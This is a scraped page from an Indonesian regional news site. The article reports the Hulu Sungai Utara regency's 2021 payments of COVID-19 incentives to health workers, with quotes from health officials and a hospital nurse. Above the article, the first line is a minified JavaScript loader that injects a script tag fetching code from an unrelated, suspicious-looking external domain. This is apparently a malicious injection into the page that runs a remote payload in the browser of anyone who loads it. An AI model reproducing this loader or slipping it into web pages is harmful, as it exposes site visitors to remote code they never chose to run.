(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Pemkab HSU Sudah Gelontorkan Rp 4,1 Miliar untuk Insentif Nakes


KANALKALIMANTAN.COM, AMUNTAI – Sedikitnya Rp 4,1 miliar atau 75 persen dari total anggaran Rp 5,1 miliar, telah digelontorkan Pemerintah Kabupaten Hulu Sungai Utara (HSU) untuk pembayaran insentif tenaga kesehatan (nakes) selama penanganan pandemi Covid-19 di tahun 2021.

“Pembayaran Insentif Nakes sebesar Rp 2,7 miliar untuk pada Agustus kemarin, disusul tambahan pembayaran pada Oktober sebesar Rp 1,4 miliar, langsung dibayarkan secara non tunai ke rekening nakes,” Terang Plt Kepala Dinas Kesehatan (Dinkes) HSU, H Danu Frans Fotohena kepada kanalkalimantan.com, Kamis (11/11/2021).

Danu menerangkan, ada dua jenis pembayaran insentif nakes yang selama ini dijalankan yakni pembayar yang terkait kegiatan testing dan tracking serta pembayaran insentif kegiatan vaksinasi di lapangan.

Untuk pembayaran insentif nakes yang melakukan vaksinasi (insentif vaksinator) sudah dibayarkan sebesar Rp 1 miliar lebih atau sekitar 17% dari pagu anggaran yang disediakan sebesar Rp 6,4 miliar.

 

 

Baca juga: Ketua DPRD Pimpin Peringatan Hari Pahlawan di Kotabaru

“Mengapa pembayaran insentif vaksinator agak sedikit melambat? karena petugas nakes terlalu sibuk melaksanakan kegiatan vaksinasi di lapangan, sehingga melupakan kewajibannya untuk melakukan klaim terkait honor vaksinator,” beber Danu.

Adapun dana insentif untuk nakes tersebut, kata Danu, berasal dari refocusing APBD Kabupaten HSU, khususnya untuk penanganan selama pandemi ini

Selain itu, ia juga mengakui cukup banyak anggaran tidak terserap karena semakin berkurangnya kasus Covif-19 di Kabupaten HSU, bahkan bisa dikatakan nol kasus.

Ada pun jumlah nakes yang menerima insentif dan besaran insentif yang diterima bervariasi sesuai jumlah kasus pasien Covid-19 yang ditangani di wilayah kerja masing-masing nakes.

Baca juga: Warga Desa Saka Lagon Divaksinasi Tahap Pertama dan Kedua

Terpisah, Direktur Rumah Sakit Umum Daerah (RSUD) Pambalah Batung Amuntai dr Moch Yandi Friyadi menginformasikan, pembayaran terakhir insentif nakes 2021 di rumah sakit dicairkan pertengahan Oktober kemarin.

“Total sejak Agustus 2020 sampai Oktober 2021 total insentif nakes yang dibayarkan sebesar Rp 6,1 miliar,” kata Yandi.

Nakes RSUD Pembalah Batung Amuntai yang menerima insentif terdiri delapan dokter spesial, enam dokter umum, 20 hingga 30 orang perawat dan bidan serta penunjang kesehatan lainnya berjumlah 18 orang.

Untuk 2020 dibayarkan Agustus-Desember total sebesar Rp 2,1 miliar

Sedangkan untuk 2021 terhitung Januari-Agustus sebesar Rp 4 miliar

Baca juga: Pertama di Kalsel, Pemko Banjarbaru Sediakan Layanan Vaksin Keliling Pakai Tiga Armada Bus

“Mengapa insentif baru bisa dicairkan Oktober karena dana insentif baru bisa diajukan di APBD Perubahan 2021,” terang Yandi.

Insentif yang diterima nakes di RSUD Pembalah Batung Amuntai berdasarkan kriteria pasien yang terkonfirmasi dirawat di RSUD Pembalah Batung.

Nominal insentif yang diterima diakui memang cukup besar karena sesuai dengan resiko pekerjaan yang diemban nakes juga cukup besar yakni merawat pasien Covid-19 dengan resiko tertular yang bisa berakibat kematian.

Bahkan, menurutnya sudah banyak nakes dan tenaga dokter yang meninggal lantaran ikut terjangkit Covid-19.

Sementara itu, salah satu tenaga nakes di RSUD Pambalah Batung Amuntai Faisal, mengakui baru satu bulan ini menerima insentif sebesar Rp7 juta. dirinya mengaku lancar-lancar saja menerima insentif nakes.

Baca juga: Apa Saja Tantangan Jenderal Andika sebagai Panglima TNI?

“Memang sempat menunggu pencairan insentif nakes selama dua bulan,” ujar Faisal.

Meski baru bekerja di RSUD, ia juga mengaku menerima insentif dengan jumlah yang tidak berbeda dengan nakes senior lainnya. (kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Risa

Recent Posts

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

13 menit ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

34 menit ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

54 menit ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

2 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

4 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

5 jam ago

This website uses cookies.